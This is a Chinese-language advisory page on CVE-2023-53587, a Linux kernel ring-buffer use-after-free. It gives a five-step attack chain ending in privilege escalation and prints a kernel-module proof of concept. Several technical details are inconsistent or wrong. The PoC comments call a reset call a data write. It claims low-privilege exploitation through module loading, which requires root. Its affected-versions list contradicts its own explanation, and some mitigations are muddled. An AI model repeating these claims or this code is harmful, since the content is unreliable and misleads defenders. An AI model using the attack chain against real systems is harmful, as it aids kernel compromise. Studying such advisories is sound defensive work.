CVE-2023-53587 Linux内核ring-buffer释放后使用漏洞

漏洞信息

漏洞编号

CVE-2023-53587

漏洞类型

释放后使用（Use-After-Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

CVE-2023-53587是Linux内核ring-buffer（环形缓冲区）子系统中存在的一个高危释放后使用（Use-After-Free）漏洞。该漏洞位于内核的ring-buffer销毁逻辑中，当ring-buffer在销毁前未能正确同步IRQ work（中断请求工作队列）时，可能导致在缓冲区内存被释放后，IRQ work仍然尝试访问已释放的内存区域，从而触发KASAN（Kernel Address Sanitizer）报告的slab-use-after-free错误，或在没有KASAN的情况下直接导致系统崩溃。

该漏洞在ARCH=um（User Mode Linux）配合time-travel（时间穿越）调试模式下被实际复现。在真实硬件系统中，由于时间窗口极小，该问题可能难以触发，但在特定时序条件下（如高负载、内核抢占等场景）仍然存在被利用的风险。攻击者可以通过精心构造的时序条件，在ring-buffer销毁过程中触发对已释放内存的访问，导致内核崩溃或权限提升。

根据CVSS 3.1评分标准，该漏洞评分为7.8分（高危），攻击向量为本地（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N），对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。该漏洞影响了多个Linux内核稳定版本，需要尽快应用安全补丁进行修复。

技术细节

该漏洞的根本原因在于ring-buffer销毁流程中缺少对IRQ work的同步操作。在Linux内核6.3.0-rc1之前的版本中，ring-buffer模块使用单一的全局IRQ work结构，因此不存在竞争条件问题。但在引入多个per-CPU ring-buffer的IRQ work之后，每个buffer拥有独立的IRQ work实例。

当ring-buffer被销毁时，如果在此之前有数据被写入buffer，相应的IRQ work可能尚未执行。ring-buffer的销毁操作会释放其占用的slab内存（kmalloc-1k，1024字节），但IRQ work回调函数仍然持有对该内存的引用。当IRQ work随后在中断上下文中执行时，会访问已经被释放的内存区域，触发use-after-free错误。

从KASAN报告中可以看到，buggy address位于kmalloc-1k缓存中已释放的1024字节区域内，距离起始地址偏移584字节。调用链为：irq_work_run_list -> irq_work_tick -> update_process_times -> tick_sched_handle -> tick_sched_timer -> __hrtimer_run_queues -> hrtimer_interrupt。

修复方案是在ring-buffer销毁函数中添加irq_work_sync()调用，确保IRQ work在buffer内存被释放之前完成执行，从而避免竞争条件。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要获得目标系统的本地低权限访问权限。由于漏洞利用复杂度低，仅需普通用户权限即可触发。

STEP 2

步骤2：加载恶意内核模块或利用现有接口

攻击者通过加载恶意的内核模块（如PoC代码所示），或者利用系统现有的ring-buffer相关接口（如tracefs、perf等），快速创建和销毁ring-buffer实例。

STEP 3

步骤3：触发竞争条件

在ring-buffer被写入数据后立即销毁，使得IRQ work尚未执行完成，而buffer的内存已经被释放。关键时序窗口在ring_buffer_free()调用与irq_work_run_list()执行之间。

STEP 4

步骤4：触发Use-After-Free

当中断触发时，IRQ work回调函数尝试访问已释放的kmalloc-1k slab内存（偏移584字节处），触发KASAN报告或系统崩溃。

STEP 5

步骤5：权限提升或拒绝服务

攻击者可以通过精心构造的UAF利用实现权限提升（提权至root），或直接导致系统内核崩溃（拒绝服务攻击）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2023-53587: Linux kernel ring-buffer use-after-free
// This vulnerability can be triggered in ARCH=um with time-travel mode
// The PoC demonstrates the kernel module that creates and destroys ring-buffers
// in rapid succession to trigger the race condition.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/ring_buffer.h>
#include <linux/delay.h>
#include <linux/kthread.h>

static struct task_struct *trigger_thread;

static int trigger_uaf(void *data)
{
    struct ring_buffer *buffer;
    int i;

    // Rapidly create and destroy ring-buffers to trigger race condition
    for (i = 0; i < 10000; i++) {
        // Create a new ring-buffer (size 1024 = kmalloc-1k)
        buffer = ring_buffer_alloc(1024, RB_FL_OVERWRITE);
        if (!buffer)
            continue;

        // Write data to trigger IRQ work scheduling
        ring_buffer_reset(buffer);

        // Immediately destroy the buffer before IRQ work can run
        // This triggers the use-after-free when IRQ work accesses
        // the freed memory
        ring_buffer_free(buffer);
    }

    return 0;
}

static int __init poc_init(void)
{
    pr_info("CVE-2023-53587 PoC loaded\n");
    trigger_thread = kthread_run(trigger_uaf, NULL, "cve_2023_53587");
    return 0;
}

static void __exit poc_exit(void)
{
    if (trigger_thread)
        kthread_stop(trigger_thread);
    pr_info("CVE-2023-53587 PoC unloaded\n");
}

module_init(poc_init);
module_exit(poc_exit);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("PoC for CVE-2023-53587 Linux kernel ring-buffer UAF");

影响范围

Linux Kernel < 6.3（引入per-CPU IRQ work后的版本）

Linux Kernel 6.3.0-rc1

Linux Kernel 6.3.x

Linux Kernel 6.4.x

Linux Kernel 6.5.x（受影响至修复前）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制普通用户加载内核模块的权限（通过配置kernel.modules_disabled=1或修改kexec_load_disabled等sysctl参数）；2）通过mount选项将/dev/kmem等设备设为只读或禁用；3）使用seccomp或namespace隔离限制不可信进程访问内核接口；4）监控内核日志中的KASAN报告，及时发现潜在的利用尝试；5）对于ARCH=um环境，避免使用time-travel模式运行不可信的二进制文件。